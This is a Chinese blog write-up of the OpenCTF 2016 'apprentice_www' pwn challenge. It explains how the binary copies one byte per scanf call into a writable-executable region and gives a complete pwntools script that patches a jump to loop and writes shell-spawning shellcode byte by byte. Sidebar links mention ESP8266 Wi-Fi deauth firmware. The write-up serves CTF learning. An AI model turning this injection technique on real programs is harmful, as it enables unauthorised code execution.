Openctf-2016-pwn-apprentice_www 题解

最新推荐文章于 2024-04-09 16:35:05 发布
最新推荐文章于 2024-04-09 16:35:05 发布
阅读量246 收藏
点赞数
分类专栏: pwn ctf 网络安全 文章标签: pwn 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A951860555/article/details/113714481
版权
网络安全 同时被 3 个专栏收录
57 篇文章 19 订阅
订阅专栏
ctf
54 篇文章 9 订阅
订阅专栏
pwn
41 篇文章 54 订阅
订阅专栏
本文详细解析了2016年OpenCTF的pwn题目apprentice_www。程序包含32位小端模式,仅开启NX保护,通过mprotect创建可写可执行内存区域。漏洞利用方法是ret2shellcode,利用scanf函数读取shellcode到内存,但由于限制需构造循环并注意%d格式的输入。文章提供漏洞定位、利用分析及解题思路。
摘要由CSDN通过智能技术生成

Write Up

文件信息

该样本来自2016年Openctf的一道pwn题–apprentice_www
检查文件信息:
  32位小端程序,只开启NX保护
check

漏洞定位

main
程序main函数如上图所示,setup函数中使用了mprotect开辟了一个可写、可读以及可执行的内存区域,其截图如下;加上checksec信息中的NX保护,其实这里已经暗示了将shellcode存储在此然后执行的漏洞利用方法。
setup
接下来我们看一下butterflySwag函数,如下图所示,其中第一个scanf函数以%u的方式读取第一次输入,第二个scanf函数以%d的方式读取第二次输入,再结合下面两行代码,我们可以理解为该程序将v2(单字节)复制到v1指向的内存地址中。最后还剩下一堆puts打印文字信息,但没有啥实际的用处。
butterflySwag

利用分析

结合上面的分析,我们可以很轻松的想到ret2shellcode的方法,通过上面两个scanf函数,将shellcode注入到mprotect开辟的可写可执行内存空间。定位该空间可以直接通过动态调试,如下图所示,最开始的两行输出展示了该内存区块的信息。
vmmap

但有个问题就是一次运行只能读取一个字节,所以这里需要先改变程序运行逻辑,尝试循环执行scanf函数,待正确读入shellcode后跳转到存储的地址执行shellcode。最后还需要注意的一个问题是读入的shellcode是以%d读取的,所以此时不能以字母的形式进行输入,也就是说如果要读入a字符,应将其转化为61(当然作为输入,类型还是字符串,也就是输入61这个字符串),这样存储在内存中的自然就是61,否则scanf函数读取出错。

wp

from pwn import *

context.log_level = "debug"
p = process("./apprentice_www")

jnz_addr = 0x080485DA
text_addr = 0x080485DB  # shellcode存储地址
# 该地址位于text段,主要是方便使用jnz进行跳转
# 并且覆盖的内容不影响程序的正常运行

context(os="linux", arch="i386")
code = asm(shellcraft.sh())
code = code.decode("ISO-8859-1")

# scanf 循环读取
# jnz   相对跳转地址的计算方法,两地址位置之差-0x2
p.sendline(str(jnz_addr))
p.sendline(str(0xc2))    # 跳转地址 0x0804859D

# 存储shellcode
for i in range(len(code)):
    p.sendline(str(text_addr+i))
    p.sendline(str(ord(code[i])))

# 跳转到shellcode
p.sendline(str(jnz_addr))
p.sendline(str(0x00))
p.interactive()

总结

该题目是传统shellcode漏洞利用的变形考法,虽然开启了NX保护,但又在程序中开辟了可写可执行的内存区域。为了增加难度,使用了scanf函数每次只能存储单个字节,并且需要自己想办法构造循环才能完整的存储shellcode。同时注意到%d和%u的格式化读取方式,该方式只能读取数字类型的字符串。

__lifanxin
关注
专栏目录
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn中沙盒保护之orw绕过
wangxunyu6的博客
03-09 1242
简单来说开启沙盒保护后execve被禁用,也就是说即使我们拿到shell也没有用。我们可以使用seccomp-tools dump指令进行查看。
【Writeup】i春秋 Linux Pwn 入门教程_Openctf 2016-apprentice_www
BAKUMANSEC - Just Do It
08-27 388
0x01 解题思路 查看文件基本信息 IDA查看 main setup 调用mprotect函数给.bss、.text、.data等段增加了可读可写可执行权限 butterflySwag   接收两次用户输入,第一次输入v1为一个地址,第二次输入v2为一个整数。之后会把v2的最低一个字节写入到v1指向的内存单元。这样就可以把shellcode写入到任意的可读可执行页。但是由于一...
CTF之CTF(夺旗赛)介绍_ctf比赛,2024年最新面试宝典
最新发布
2401_84164527的博客
04-09 1083
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
Python初步学习(二)
xiaoka__的博客
07-28 152
今天博主在学Python的文件处理,话不多说,let’s go! 前言:我们可以在服务器上用Python写web程序。 Python中的文件处理: 相比于C语言的文件处理中的函数需要那么多参数,Python这门语言显得人性化的多。 一个关键函数是open()函数,open() 函数有两个参数:文件名和模式。 1.文件打开 有四种打开文件的不同方法(模式): "r" - 读取 - 默认值。打开文件进行读取,如果文件不存在则报错。 "a" - 追加 - 打开供追加的文件,如果不存在则创建该文件。 "w" - 写
XCTF OpenCTF 2017 部分WP(8道)
qq_42192672的博客
10-10 1727
最近想去看看XCTF实训平台,算是给自己的一个督促吧,选的第一个目标是OpenCTF 2017 1. OpenReverse 拖进IDA分析main函数,截图如下 其实就是比较v30与v4地址处的字符串是否相等,v30是我们的输入,那么关键就是看v4了 v4的初始值我们都知道,接下来观察函数40100对v4有什么改变 发现有对v4开始的26个字符全部进行了一个异或操作 当然拉我们动...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
OpenCTF:一个用php编写的开源CTF托管平台
06-04
开放式CTF 一个用php编写的开源CTF托管平台
【XCTF练习】OpenCTF 2017 OpenReverse writeup
iqiqiya的博客
10-24 758
查壳无壳   VC的程序 OD载入    反汇编视图右键  中文搜索引擎--智能搜索 双击right进入 上边这里下个断点  F9运行   F8单步  走到地址00401123处 发现疑似flag的字符串    复制输入验证  就是真的flag XCTF{5eacs6y8p1o9gitc9521}...
Pwn的常见保护介绍
educat0r的博客
02-16 1351
一:canary Canary是金丝雀的意思。技术上表示最先的测试的意思。这个来自以前挖煤的时候,矿工都会先把金丝雀放进矿洞,或者挖煤的时候一直带着金丝雀。金丝雀对甲烷和一氧化碳浓度比较敏感,会先报警。所以大家都用canary来搞最先的测试。stack canary表示栈的报警保护。 在函数返回值之前添加的一串随机数(不超过机器字长),末位为/x00(提供了覆盖最后一字节输出泄露canary的可...
(补题)HITCON 2018 PWN baby_tcache超详细讲解
hollk’s blog
05-19 1758
好久没有更新了,这道题利用的是IO_FILE输出的方式进行泄露libc地址,需要结合着上一篇[好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc]一起来看,最近参加了安网杯,其中的pwn题也是利用IO_FILE进行输出的题,很幸运获得的第二名的成绩,大佬带飞~ 得抓紧把好好说话系列写完啦~
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 6323
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
swpuctf2019 Login pwn详细题解
seaaseesa的博客
12-09 1711
Login 这是swpuctf2019的第二道pwn题,主要考点就是非栈上的字符串格式化漏洞利用。 首先,我们检查一下程序的保护机制 PIE和RELRO没有开启,那么我们可以轻易的利用漏洞修改GOT表 我们用IDA分析一下 在这里,有一个明显的格式化字符串漏洞,由于s1不是在栈上,而是在bss段里,所以漏洞利用起来会比栈上的字符串格式化漏洞稍微繁琐一些。由于外层是一个死循环,所以...
练习 > CTF解题 > OpenCTF 2017 > variacover(变量覆盖和MD5绕过)
Gunther的博客
09-09 2981
<?php error_reporting(0); if (empty($_GET['id'])) { show_source(__FILE__); die(); }else{ include('flag.php'); $a = "www.OPENCTF.com"; $id = $_GET['id']; @parse_str($id); if ($a[0] != 'QNKC
PWN题搭建
weixin_30855761的博客
06-07 570
0x00.准备题目 例如:level.c #include <stdio.h> #include <unistd.h> int main(){ char buffer[0x10] = {0}; setvbuf(stdout, NULL, _IOLBF, 0); printf("Do your kown what is it : ...
Hitcon 2016 Pwn赛题学习
weixin_30553777的博客
04-26 277
PS:这是我很久以前写的,大概是去年刚结束Hitcon2016时写的。写完之后就丢在硬盘里没管了,最近翻出来才想起来写过这个,索性发出来 0x0 前言 Hitcon个人感觉是高质量的比赛,相比国内的CTF,Hitcon的题目内容更新,往往会出现一些以前从未从题目中出现过的姿势。同时观察一些CTF也可以发现,往往都是国外以及台湾的CTF中首先出现的姿势,然后一段时间后才会被国内的CTF学习到。 此次...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值